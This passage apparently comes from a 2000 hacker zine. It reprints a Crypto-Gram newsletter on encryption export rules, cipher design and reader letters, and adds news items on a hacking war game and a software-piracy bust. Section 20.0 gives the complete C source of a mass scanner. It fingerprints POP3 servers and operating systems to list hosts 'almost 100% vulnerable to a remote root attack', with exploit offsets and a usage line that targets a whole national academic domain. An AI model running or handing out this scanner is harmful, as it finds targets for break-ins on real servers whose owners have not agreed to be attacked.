http://www.epic.org/security/CIP/
White House plan (PDF):
http://www.whitehouse.gov/WH/EOP/NSC/html/documents/npisp-execsummary-000105.pdf
White House press release:
http://www.epic.org/security/CIP/WH_pr_1_7_00.html
White House press briefing:
http://www.epic.org/security/CIP/WH_briefing_1_7_00.html

** *** ***** ******* *********** *************

New U.S. Encryption Regulations

We have some, and they're a big improvement. On the plus side, "retail" encryption products -- like browsers, e-mail programs, or PGP -- will be widely exportable to all but a few countries "regardless of key length or algorithm." On the minus side, the new regulations are complex (an unending stream of work for the lawyers) and will still make it difficult for many people to freely exchange encryption products. They also do not address the Constitutional free speech concerns raised by encryption export controls.

Major features of the new regs:

* "Retail" encryption products are exportable, regardless of key length or algorithm, to all but the designated "T-7" terrorist nations. In order to export you need to fill out paperwork. You need to get a retail classification, submit your product to a one-time technical review, and submit periodic reports of who products are shipped to (but not necessarily report end users).

* Export of encryption products up to 64 bits in key length is completely liberalized.

* "Non-retail" products will require a license for many exports, such as to foreign governments or foreign ISPs and telcos under certain circumstances.

* Source code that is "not subject to an express agreement for the payment of a licensing fee or royalty for commercial production or sale of any product developed with the source code" is freely exportable to all but the T-7 terrorist countries. Source code exporters are required to send the Department of Commerce a copy of the code, or a URL, upon publication. Note that posting code on a web site for anonymous download is allowed; you are not required to check that downloaders might be from one of the prohibited countries.

One obvious question is: "How does this affect the Bernstein and Karn court cases?" I don't know yet. The free speech concerns are not addressed, but the things that Bernstein and Karn wanted to do are now allowed. We'll have to see what the attorneys think.

A more personal question is: "How does this affect the Applied Cryptography source code disks?" Near as I can tell, all I have to do is notify the right people and I can export them. I will do so as soon as I can. Stay tuned.

The actual regs (legalese):
http://www.eff.com/pub/Privacy/ITAR_export/2000_export_policy/20000112_cryptoexport_regs.html

EFF's press release:
http://www.eff.com/11300_crypto_release.html

Reuters story with BSA and Sun reactions:
http://news.excite.com/news/r/000112/19/tech-tech-encryption

Reuters story with EFF reaction:
http://news.excite.com/news/r/000113/13/tech-tech-encryption

AEA reaction press release:
http://news.excite.com/news/pr/000112/dc-aea-encryption-reg

ACLU and EPIC reaction:
http://news.excite.com/news/zd/000113/18/crypto-compromise-a

** *** ***** ******* *********** *************

Counterpane Internet Security News

Bruce Schneier profiled in Business Week:
http://businessweek.com/cgi-bin/ebiz/ebiz_frame.pl?url=/ebiz/9912/em1229.htm

Bruce Schneier is speaking at BlackHat in Singapore, 3-4 April 2000. He'll also be at BlackHat and DefCon in Las Vegas.
http://www.blackhat.org
http://www.defcon.org

Bruce Schneier is speaking at the RSA Conference in San Jose: Tuesday, 18 Jan, 2:00 PM, on the Analyst's Track. I don't know if it made it into the program, but Bruce will be on stage with Matt Blaze, Steve Bellovin, and several other really smart people.

** *** ***** ******* *********** *************

The Doghouse: Netscape

Netscape encrypts users' e-mail passwords with a lousy algorithm. If this isn't enough, their comments to the press cement their inclusion in the doghouse:

"Chris Saito, the senior director for product management at Netscape, said that the option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that 'computer experts could still access the information, in case someone forgot their password.'"

In other words, they implemented lousy security on purpose.

"Netscape's Saito said the company wasn't aware of the vulnerability and added that a 'security fix' would be forthcoming if that vulnerability were proved to exist.
If the Javascript vulnerability doesn't exist, a password stealer would have to have physical access to a user's computer to figure out the algorithm."

Note the complete ignorance of viruses like Melissa, or Trojan horses like Back Orifice.

"Saito noted that Netscape already has numerous safety features, including a Secure Sockets Layer, which enables users to communicate securely with Web servers, and a protocol for encrypting e-mail messages sent."

None of which matters if the password is stolen.

http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html

RST's information:
http://www.rstcorp.com/news/bad-crypto.html
http://www.rstcorp.com/news/bad-crypto-tech.html

** *** ***** ******* *********** *************

Block and Stream Ciphers

Block and stream ciphers both transform a message from plaintext to ciphertext one piece at a time. Block ciphers apply the same transformation to every piece of the message, and typically deal with fairly large pieces of the message (8 bytes, 16 bytes) at a time. Stream ciphers apply a different transformation to each piece of the message, and typically deal with fairly small pieces of the message (1 bit, 1 byte) at a time. Traditionally they have been separate areas of research, but these days they are converging. And if you poke around at the issues a bit, you'll see that they are not very different at all.

Stream ciphers first. Traditional stream ciphers consist of three standard pieces: an internal state, a next-state function, and a plaintext-to-ciphertext transformation function. The internal state is generally small, maybe a hundred bits, and can be thought of as the key. The next-state function updates the state. The transformation function takes a piece of plaintext, mixes it with the current state, and produces the same size ciphertext. And then the stream cipher goes on to the next piece.

The security of this scheme is based on how cryptographically annoying the two functions are. Sometimes just one of the functions is cryptographically annoying. In electronic stream ciphers, a complicated next-state function is usually combined with a simple transformation that takes the low-order bit of the state and XORs it with the plaintext. In rotor machines, such as the German Enigma, the next-state function was a simple stepping of various rotors, and the transformation function was very complicated. Sometimes both are cryptographically complicated.

These ciphers could generally operate in two modes, depending on the input into the next-state function. If the only input was the current state, these were called output-feedback (OFB) ciphers. If there was the additional input of the previous ciphertext bit, these were called cipher-feedback (CFB) ciphers. (If you were in the U.S. military, you knew these modes as "key auto-key" (KAK) and "ciphertext auto-key" (CTAK), respectively.) And you chose one mode over the other because of error propagation and resynchronization properties. (Applied Cryptography explains all this in detail.)

Traditionally, stream cipher algorithms were as simple as possible. These were implemented in hardware, and needed as few gates as possible. They had to be fast. The result was many designs based on simple mathematical functions: e.g., linear feedback shift registers (LFSRs). They were analyzed based on metrics such as linear complexity and correlation immunity. Analysts looked at cycle lengths and various linear and affine approximations. Most U.S. military encryption algorithms, at least the ones in general use in the 1980s and before, are stream ciphers of these sorts.

Block ciphers are different. They consist of a single function: one that takes a plaintext block (a 64-bit block size is traditional) and a key and produces a ciphertext block. The NSA calls these ciphers codebooks, and that is an excellent way to think of them. For each key, you can imagine building a table. On the left column is every possible plaintext block; on the right column is every possible ciphertext block. That's the codebook. It would be a large book, 18 billion billion entries for the smallest commonly used block ciphers, so it is easier to just implement the algorithm mathematically -- especially since you need a new book for each key. But in theory, you could implement it as a single table lookup in a very large codebook.

Block ciphers can be used simply as codebooks, encrypting each 64-bit block independently (and, in fact, that is called electronic codebook (ECB) mode), but that has a bunch of security problems. An attacker can rearrange blocks, build up a portion of the codebook if he has some known plaintext, etc. So generally block ciphers are implemented in one of several chaining modes.

Before listing the block cipher chaining modes, it's worth noticing that a block cipher algorithm can serve as any of the functions needed to build a stream cipher: the next-state function or the output function. And, in fact, that is what block cipher modes are: stream ciphers built using the block cipher as a primitive. A block cipher in output-feedback mode is simply the block cipher used as the next-state function, with the output of the block cipher being the simple output function. A block cipher in cipher-feedback mode is the same thing, with the addition of the ciphertext being fed into the next-state function. A block cipher in counter mode uses the block cipher as the output function, and a simple counter as the next-state function. Cipher block chaining (CBC) is another block-cipher mode; I've seen the NSA call this "cipher-driven codebook" mode. Here the block cipher is part of the plaintext-to-ciphertext transformation function, and the next-state function is simple.

For some reason I can't explain, for many years academic research on block ciphers was more practical than research on stream ciphers. There were more concrete algorithm proposals, more concrete analysis, and more implementations. While stream cipher research stayed more theoretical, block ciphers were used in security products. (I assume this was the reverse in the military, where stream ciphers were used in products and were the target of operational cryptanalysis resources.) DES's official sanction as a standard helped this, but before DES there was Lucifer. And after DES there was FEAL, Khufu and Khafre, IDEA, Blowfish, CAST, and many more.

Recently, stream ciphers underwent something of a renaissance. These new stream ciphers were designed for computers and not for discrete hardware. Instead of producing output a bit at a time, they produced output a byte at a time (like RC4), or 32 bits at a time (like SEAL or WAKE). And they were no longer constrained by a small internal state -- RC4 takes a key and turns it into a 256-byte internal state, SEAL's internal state is even larger -- or tight hardware-based complexity restrictions. Stream ciphers, which used to be lean and mathematical, started looking as ugly and kludgy as block ciphers. And they started appearing in products as well.

So, block and stream ciphers are basically the same thing; the difference is primarily a historical accident. You can use a block cipher as a stream cipher, and you can take any stream cipher and turn it into a block cipher. The mode you use depends a lot on the communications medium -- OFB or CBC makes the most sense for computer communications with separate error detection, while CFB worked really well for radio transmissions -- and the algorithm you choose depends mostly on performance, standardization, and popularity.

There's even some blurring in modern ciphers. SEAL, a stream cipher, looks a lot like a block cipher in OFB mode. Skipjack, an NSA-designed block cipher, looks very much like a stream cipher. Some new algorithms can be used both as block ciphers and stream ciphers.
But stream ciphers should be faster than block ciphers. Currently the fastest block ciphers encrypt data at 18 clock cycles per byte (that's Twofish, the fastest AES submission). The fastest stream ciphers are even faster: RC4 at 9 clock cycles per byte, and SEAL at 4. (I'm using a general 32-bit architecture for comparison; your actual performance may vary somewhat.)

I don't believe this is an accident. Stream ciphers can have a large internal state that changes for every output, but block ciphers have to remain the same. RC4 has a large table -- you can think of it as an S-box -- that changes every time there is an output. Most block ciphers also have some kind of S-box, but it remains constant for each encryption with the same key.

There's no reason why you can't take a block cipher, Blowfish for example, and tweak it so that the S-boxes modify themselves with every output. If you're using the algorithm in OFB mode, it will still encrypt and decrypt properly. But it will be a lot harder to break for two reasons. One, the internal state is a moving target and it is a lot harder for an attacker to build a model of what is going on inside the state. Two, if the plaintext-to-ciphertext transformation is built properly, attacks based on chosen plaintext or chosen ciphertext are impossible. And if it is a lot harder to break a cipher with self-modifying internals, then you can probably get by with fewer rounds, or less complexity, or something. I believe that there is about a factor of ten speed difference between a good block cipher and a good stream cipher.

Designing algorithms is very hard, and I don't suggest that people run out and modify every block cipher they see. We're likely to continue to use block ciphers in stream-cipher modes because that's what we're used to, and that's what the AES process is going to give us as a new standard. But further research into stream ciphers, and ways of taking advantage of the inherent properties of stream ciphers, is likely to produce families of algorithms with even better performance.

** *** ***** ******* *********** *************

Comments from Readers
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: German smart-card hack

The note on "German hackers have succeeded in cracking the Siemens digital signature chip" in the 1999-12-15 CRYPTO-GRAM is wrong. I have been in contact with the German Hacker (Christian Kahlo) behind this story. He discovered that one user of the Siemens SLE44 chip series included in his ROM software a routine that allowed him to upload and execute not only interpreter bytecode, but also raw 8052 assembler instructions. Using this undocumented facility, Christian uploaded a tiny assembler program that dumped the entire ROM of the card. The ROM was investigated, posted on the USENET as a documented disassembler listing in a TeX file and no vulnerabilities were found.

Christian also discovered in the ROM that the SLE chips send out the chip type and serial number when the I/O line is held low during a positive reset edge and the following 600-700 clock cycles, which is a perfectly normal feature (comparable to the BIOS power-up message of a PC) that is fully documented in the SLE44 data sheets and that is not security relevant.

No smartcard applications were hacked this way, no vulnerability was found in any smartcard application, and definitely no private keys were compromised. All this also has nothing to do with digital signatures. Any news to the contrary is the result of misunderstandings by journalists, who as usual fill in the gaps of the story with their limited technical background knowledge and try to formulate such reports to be more spectacular than the story behind them.

The only policy that has been violated here is that Siemens -- like most other smartcard chip producers -- tries to make sure that nobody except big customers can easily get access to smartcard development kits that allow uploading assembler code directly, which might otherwise shorten the learning curve for a microprobing attacker slightly. Users of Siemens chips that allow code uploads are apparently required to use a bytecode interpreter instead. This policy seems to have been ignored secretly by one Siemens customer who left a backdoor in his byte-code interpreter to enable the later upload of high-speed crypto routines that cannot be implemented sufficiently efficiently in the bytecode. Christian discovered this, even though he decided *not* to publish the details on how he did this or the name of the Siemens customer in whose cards he had discovered this. All he published was a dump of the standard Siemens SLE ROM code (CMS = Chip Management System, comparable to a PC BIOS), a piece of code that had already been known semi-publicly for many years in the pay-TV hacking community from successful microprobing attacks on the SLE44 series.

Christian's main contribution is that he has discovered a very nice low-cost assembler-level development kit for some of the SLE smartcards, which used to cost a fortune and an NDA before. This is not the first time that this has happened: Pay-TV smartcards have been shipped before with software that provides for uploads of EEPROM software patches with broken authentication techniques, which has been known and used in the smartcard tampering community for many years.
From: anonymous
Subject: Re: New U.S. Crypto Export Regulations

In CRYPTO-GRAM of December 15, 1999 you wrote about the proposed new U.S. crypto export regulations, and I can agree with everything you said. However, I believe you missed something important: the view FROM the rest of the world.

I work in the finance industry in Europe -- Zurich, to be precise -- and have some involvement with security. This industry (a) WILL NOT use U.S. crypto products, and (b) will certainly NOT make any long-term plans or partnerships to do so for U.S. products with consumer content, because (a) the products to date are forced by law to be weak, but more important, (b) the U.S. government can't be trusted. Even if it approved today the export of some products based on strong crypto, everyone knows that this permission could be terminated tomorrow for the same or other products. And everyone also suspects strongly that the U.S. government will in any case force providers to put trap doors into their products.

Under the circumstances, the European finance and e-business industries would have to be crazy to use U.S. crypto-based products. And they're not crazy.

To play in this business in the rest of the world, the U.S. will have to have a clear, consistent, and favorable policy, and U.S. companies will have to present products that are demonstrably strong with no trap doors. (I invite you to speculate if this will happen before Hell freezes over.)

In the meantime, there are plenty of non-U.S. products to choose from, and banks like UBS, Credit Suisse, Grupo Intesa, Societe General, Deutsche Bank, Generale Bank, Bank Austria, and Barclays are not sitting back anxiously waiting for U.S. products to become available. They're doing business with non-U.S. products that are just fine, thank you.
From: "Grawrock, David" <david.grawrock@intel.com>
Subject: Electronic voting

All these comments regarding electronic voting and absentee voting are missing the mark. In the State of Oregon, all elections (except presidential) are done by mail. It's like the entire state is voting absentee. The process is actually pretty painless. You receive your voter pamphlet and then you get your ballot. It has to be in by election day. If you miss the excitement of going to the voting booth there are collection points where you can drop off your filled in ballot. It's really not that hard.

The point here is that the state has determined that it is easier (and cheaper) to simply process the entire election via the absentee process. It now becomes a simple step to go from by mail to by electronic voting. All of the arguments regarding coercion must already have been answered (the government always thinks a process through completely). We have elected all sorts of politicians without anyone coming back and reporting problems with coercion.

From: Gerry Brown <gerry@liberate.com>
Subject: RE: Absentee Ballots

I just checked some figures with a friend who has the data on Absentee Ballots for San Mateo County in California and he has compared it with the San Francisco elections held this week. The percentage of registered voters using absentee ballots is about 13%-15%. But more astonishing is the fact that 35%-50% of those actually voting are done by absentee ballots. The lower figure is for national elections and the higher side corresponds to local elections.
From: "Hillis, Brad" <BradH@DIS.WA.GOV> Subject: PKI article--agree and disagree I can't begin to tell you how much I enjoyed your article with Carl Ellison, "Ten Risks of PKI: What You're not Being Told about Public Key." I'm the lead ecommerce attorney for the state of Washington, and we are currently procuring a private PKI vendor to provide digital signatures for state and local government, similar to the federal government ACES procurement. What you say that PKI is not needed for ecommerce to flourish is true. It's a thought I keep having at all the digital signature law presentations I attend, and the theme I had planned to discuss at my March 7 talk in Boston on PKI. One has to keep asking oneself, why do I need a digital signature? What is the opportunity cost of setting up a PKI? (That is, what security improvements could I make if I spent the money on something besides PKI). However, I disagree with this statement in your article: "In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible." The law seems to say that at first reading, but my view of the law is that it sets up a "rebuttable presumption" of non-repudiation. This is the same rule that applies to physical, pen and ink signatures. Your statement reflects the views of some proponents of PKI who overstate the legal force of a "licensed digital signature" under Washington law. But if, in fact, I never applied my digital signature to a document, and I can prove it (e.g., I have an alibi), then I would not be legally responsible. 
I believe that is the situation in non-PKI electronic signature schemes, where a (paper and manually signed) Electronic Data Interchange Agreement or Trading Partner Agreement will state that all data submitted between the parties carries the same legal force as if it was manually signed. Having found flaws in the PKI-style laws of Washington, Utah and Minnesota, I do not find a great deal of higher or practical intelligence in the more popular electronic signature laws, either. Esignature laws have not proven any more important to ecommerce than PKI digital signature laws, so why are we in such a rush to pass UETA (uniform electronic transaction act)? 
From: "Carl Ellison" <cme@acm.org> Subject: Re: PKI article--agree and disagree You are correct. However, I believe we still need to warn against the rebuttable presumption of non-repudiation. The keyholder may have no alibi at all. The keyholder may not be aware that his key was misused (e.g., by an attacker who had gained physical or network access to his computer). This is similar to the position people were in in Britain when they were challenging ATM card operations. It took expert witnessing by Ross Anderson to defend some of their claims, and even then it didn't always work. There, too, the presumption was that the cardholder performed any operation when the ATM logs said he did -- whether he did or not. It was up to the cardholder to prove the negative. This gets even worse when the keyholder has his private key on a smartcard in his possession. It's that much harder to convince a jury that you didn't sign, if the merchant or bank can claim that the signing key never left your personal possession. When an attacker has network access to your computer, he doesn't leave a trail. You have no audit record showing the attack. It's your word against the merchant's and you have no evidence to offer on your behalf. You can't even accuse anyone else. You have no idea who to accuse. Meanwhile, your account has been debited until you manage to prove your point (against the presumption that you're lying). When you compare this to credit card purchases, it's radically different. With a credit card, you have not spent anything until you write the check to the credit card company. When or before you write that check, you can challenge a line item and force the merchant to prove that you were in fact the purchaser. At least with my AMEX account, the immediate result is that AMEX removes the item from my statement -- to be reinstated if the merchant is able to prove that I did do the purchase. 
I have had such challenges go my way once and the other times, I had simply forgotten. In one case, I thought I was being double-billed, but it turns out I had never been billed the first time (many months before). 
From: Alfred John Menezes <ajmeneze@cacr.math.uwaterloo.ca>
Subject: Elliptic Curve Cryptosystems

I read with interest your recent article on ECC in the November 15 issue of Crypto-Gram. I agree with most of your statements and comments. Your recommendations were:

1) If you're working in a constrained environment where longer keys just won't fit, consider elliptic curves.
2) If the choice is elliptic curves or no public-key algorithms at all, use elliptic curves.
3) If you don't have performance constraints, use RSA.
4) If you are concerned about security over the decades (and almost no systems are), use RSA.

I certainly agree with recommendations 1) and 2) -- ECC certainly cannot be worse than no security at all! Regarding recommendation 3), I think that most environments which call for public-key solutions will have *some* performance constraints. The limiting factor could be an over-burdened web server which needs to sign thousands of outgoing messages per minute, a handheld device which is communicating with a PC, etc. In such scenarios, one should select the public-key method that performs the best in the most constrained environment. If the constraints involve key sizes, bandwidth, power consumption, or speed (for private key operations), then ECC is likely the method of choice over RSA. Finally, I feel that your recommendation that RSA should be used (instead of ECC) in situations where you are concerned with long-term security is a bit unfair. After all, as you state in the postscript to your article, all the analysis you used on the elliptic curve discrete logarithm problem also applies to the integer factorization problem. I propose that applications which do require long-term security should consider using *both* RSA and ECC -- by double encrypting a message with RSA and ECC, or by signing a message twice with RSA and ECC. The following are my condensed thoughts on the security and efficiencies of ECC as compared with RSA.
They should be considered a supplement to your Crypto-Gram article, and not a replacement of it.

http://www.cacr.math.uwaterloo.ca/~ajmeneze/misc/cryptogram-article.html

((This is a good essay, but remember the author's bias. He works for Certicom, and it is in his financial interest for you to believe in elliptic curves. --Bruce))

** *** ***** ******* *********** *************

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography.

Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/

Copyright (c) 2000 by Bruce Schneier

ISN is sponsored by Security-Focus.COM

@HWA

20.0 POPS.C qpop vulnerability scanner by Duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* POPScan QPOP/UCB/SCO scanner by duro
   duro@dorx.net
   takes list of ip's from stdin

   The hosts gathered by this scanner are almost 100% vulnerable to a remote root attack.
   The exploits used to root the vulnerable machines can all be found by searching bugtraq.
   UCB pop is 100% of the time vulnerable to the qpop exploit (it's a very old version of qpop).
   The QPOP version is filitered to make sure that non-vulnerable versions do not show up in the scan.

   Common offsets for the bsd qpop exploit are: 621, 1500, 500, 300, 900, 0

   Example usage:

   ./z0ne -o ac.uk | ./pops > ac.uk.log &

   would scan ac.uk for vulnerabilities.

   much help from jsbach
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>

int ADMtelnet (u_long, int port);
char domain[50];
int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */
char ip[16];
int temp1 = 0;
void scan(char *ip);

void alrm(void)
{
    return;
}

main()
{
    while( (fgets(ip, sizeof(ip), stdin)) != NULL)
        switch(fork()) {
        case 0: {
            scan(ip);
            exit(0);
        }
        case -1: {
            printf("cannot fork so many timez@!@^&\n");
            exit(0);
            break;
        }
        default: {
            currchilds++;
            if (currchilds > NUMCHILDREN)
                wait(NULL);
            break;
        }
        }
}

void scan(char *ip)
{
    char printip[16];
    struct sockaddr_in addr;
    int sockfd;
    char buf[512];

    bzero((struct sockaddr_in *)&addr, sizeof(addr));
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr(ip);
    addr.sin_port = htons(110);
    addr.sin_family = AF_INET;
    signal(SIGALRM, alrm);
    alarm(5);
    if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1)) {
        recv(sockfd, (char *)buf, sizeof(buf), 0);
        if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL) {
            checkos(ip,1);
        }
        if((strstr(buf, "UCB")) != NULL)
            checkos(ip,2);
        if((strstr(buf, "SCO")) != NULL) {
            strcpy(printip, ip);
            if ((temp1=strrchr(printip, '\n')) != NULL)
                bzero(temp1, 1);
            printf("%s: SCO Unix box running SCO pop.\n",printip);
        }
    }
    return;
}

// }

checkos(char *ip, int spl)
{
    int temp2;
    char printip[16];
    unsigned long temp;

    temp = inet_addr(ip);
    temp2 = ADMtelnet(temp, 23);
    strcpy(printip, ip);
    if ((temp1=strrchr(printip, '\n')) != NULL)
        bzero(temp1, 1);
    if ((temp2 == 1)&&(spl==1))
        printf("%s: OpenBSD box running vuln QPOP\n",printip);
    if ((temp2 == 1)&&(spl==2))
        printf("%s: OpenBSD box running vuln UCB pop\n",printip);
    if ((temp2 == 2)&&(spl==1))
        printf("%s: FreeBSD box running vuln QPOP\n",printip);
    if ((temp2 == 2)&&(spl==2))
        printf("%s: FreeBSD box running vuln UCB pop\n",printip);
    if ((temp2 == 3)&&(spl==1))
        printf("%s: BSDi box running vuln QPOP\n",printip);
    if ((temp2 == 3)&&(spl==2))
        printf("%s: BSDi box running vuln UCB pop\n",printip);
}

int ADMtelnet (u_long ip, int port)
{
    struct sockaddr_in sin;
    u_char buf[4000];
    int dasock, len;
    int longueur = sizeof (struct sockaddr_in);

    dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */
    sin.sin_family = AF_INET;
    sin.sin_port = htons (port);
    sin.sin_addr.s_addr = ip;
    if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
        return (-1);
    while (1) {
        memset (buf, 0, sizeof (buf));
        if ((len = read (dasock, buf, 1)) <= 0)
            break;
        if (*buf == (unsigned int) 255) {
            read (dasock, (buf + 1), 2);
            if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
            else if ((u_char) * (buf + 1) == (unsigned int) 253) {
                *(buf + 1) = 252;
                write (dasock, buf, 3);
            }
        } else {
            if (*buf != 0) {
                bzero (buf, sizeof (buf));
                read (dasock, buf, sizeof (buf));
                usleep(40000);
                if((strstr(buf, "OpenBSD") != NULL))
                    return 1;
                if((strstr(buf, "FreeBSD") != NULL))
                    return 2;
                if((strstr(buf, "BSDI") != NULL))
                    return 3;
                sleep (1);
            }
        }
    }
    return 0;
}

@HWA

21.0 Hackunlimited special birthday free-cdrom offer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by noose

http://www.hackunlimited.com/

Would you want to have all the files in Hackunlimited.com on CD, for free of course? Just send mail to noose@hackunlimited.com. The message itself can be empty, just put the Subject to "Free CD" and you are part of our "lottery" :). You have time until 13th of February to send the message. 3 people will win the CD. The winners will be announced on 22nd of February.
The CD will include all files at http://www.hackunlimited.com + all the files in http://www.hackunlimited.com/raz0r

The file list is available here: http://www.hackunlimited.com/cdlist.txt

@HWA

22.0 HACK MY SYSTEM! I DARE YA!
~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.securiteam.com/securitynews/_Can_you_break_into_my_system__I_dare_you__.html

Title
"Can you break into my system? I dare you!"

Summary
We in Beyond Security believe that the only way to test your security is by trying to break it. But we're not as drastic as one Linux system administrator who took this one step further - he is asking attackers to try and break into a server he is administrating.

Details
Many administrators have to deal with potentially malicious users having legal accounts on their servers. Universities, ISPs and large companies have to consider the risk that local users, having access to the system as valid users, will sometime try to elevate their privileges. The system administrator of zeus-olympus.yi.org assumes that some of his users are 'evil'. Although he is confident that his Linux system is secured, he would like others to do their best to attack his system. He therefore provided two user accounts that have normal user access to the system, and he allows anyone who wishes to use those accounts and gain entry to the server. Once logged in, the users are free to try and compromise the system's security, with no strings attached. The only 'catch' is that once a vulnerability is found, it should be reported immediately, so that the hole can be closed. This offer is extremely unique. There have been 'hacking' contests in the past (usually by commercial companies trying to show that their product is secure), but this is one of the first times that an administrator is offering full access to the machine (using a valid user account) - which of course makes this game much more interesting.
Therefore, if you would like to try and break a Linux Redhat machine, join this war game and give it your best shot. Additional information To join the contest, visit http://zeus-olympus.yi.org/ and enter the 'password required' section. The login is: war and the password is game. Upon entering this section, you will receive the account information needed to log into the server. Feel free to give Danny some feedback about his war game: dannyw@mediaone.net. @HWA 23.0 PWA lead member busted by the FBI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by TRDonJuan http://www.suntimes.com/output/news/ware04.html Software pirating ring cracked by local FBI February 4, 2000 BY LORRAINE FORTE STAFF REPORTER Chicago FBI agents say they have broken up a worldwide ring of software thieves--called the "Pirates with Attitude"--who were distributing thousands of programs, including the yet-unreleased Windows 2000. A tip from an informant in Chicago led to the breakup of "one of the most sophisticated and longest-standing" piracy and hacking rings, according to a complaint filed Thursday in federal court in Chicago. The FBI used the informant's access codes to break into the group's Web site and obtain a roster of the suspects. Robin Rothberg was arrested Thursday at his home in New Chelmsford, Mass., near Boston. Federal officials say he was a founder and key member of the ring, which evaded law enforcement for eight years. He is charged with conspiring to infringe copyright. Three days before Christmas, Rothberg somehow got a copy of Windows 2000--the latest update of the operating system, scheduled to go on sale next month--and uploaded it to the Internet, according to the criminal complaint. Rothberg, an employee of NEC Technologies, accessed the group's Internet site through a Zenith Data Systems computer server in Buffalo Grove, the complaint states. At least two other users allegedly pirated and distributed software through servers in Chicago, at MegsInet Inc. 
on West Ohio and at Computer Engineers Inc. on North Wacker. Members of the group downloaded software in exchange for uploading other programs, said Assistant U.S. Attorney Lisa Griffin. They might then give away or sell that software. "It was a barter system, with the upshot being that the site itself contained an incredible amount of software," Griffin said. FBI spokesman Ross Rice said the investigation is continuing. Authorities do not yet know the size of the pirating ring, or the monetary value of the thousands of stolen software titles allegedly distributed from the group's WAREZ site, called Sentinel. WAREZ is a term for an Internet site that distributes pirated versions of software. The Sentinel site was launched in April 1996 and was set up so that only authorized users could access it; it was not available to the general public. The group's members were "carefully screened to minimize the risk of detection" and were given specific roles, such as "crackers," who stripped away the copy protection often embedded in commercial software; "couriers," who transferred large volumes of software files from other pirating sites, and "suppliers," who brought in programs from major software companies. Rothberg, according to the complaint, stole at least nine other major Microsoft programs between June and October 1999. Microsoft did not respond Thursday to requests to comment on the case. An industry group, the Business Software Alliance, has said software theft costs 33,000 jobs and $11 billion a year. -=- http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm FBI nabs Chelmsford man in software piracy ring by Andrea Estes Friday, February 4, 2000 Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder. 
Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says. The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said. In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives. Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail. According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy. The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago. Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system. Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users. ``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder. 
``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote. So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing. ``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.'' Members give and take what they wish, officials said. ``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois. Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service. Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance. Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings. Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State.

@HWA

24.0 Mitnick's Release Statement
~~~~~~~~~~~~~~~~~~~~~~~~~~~

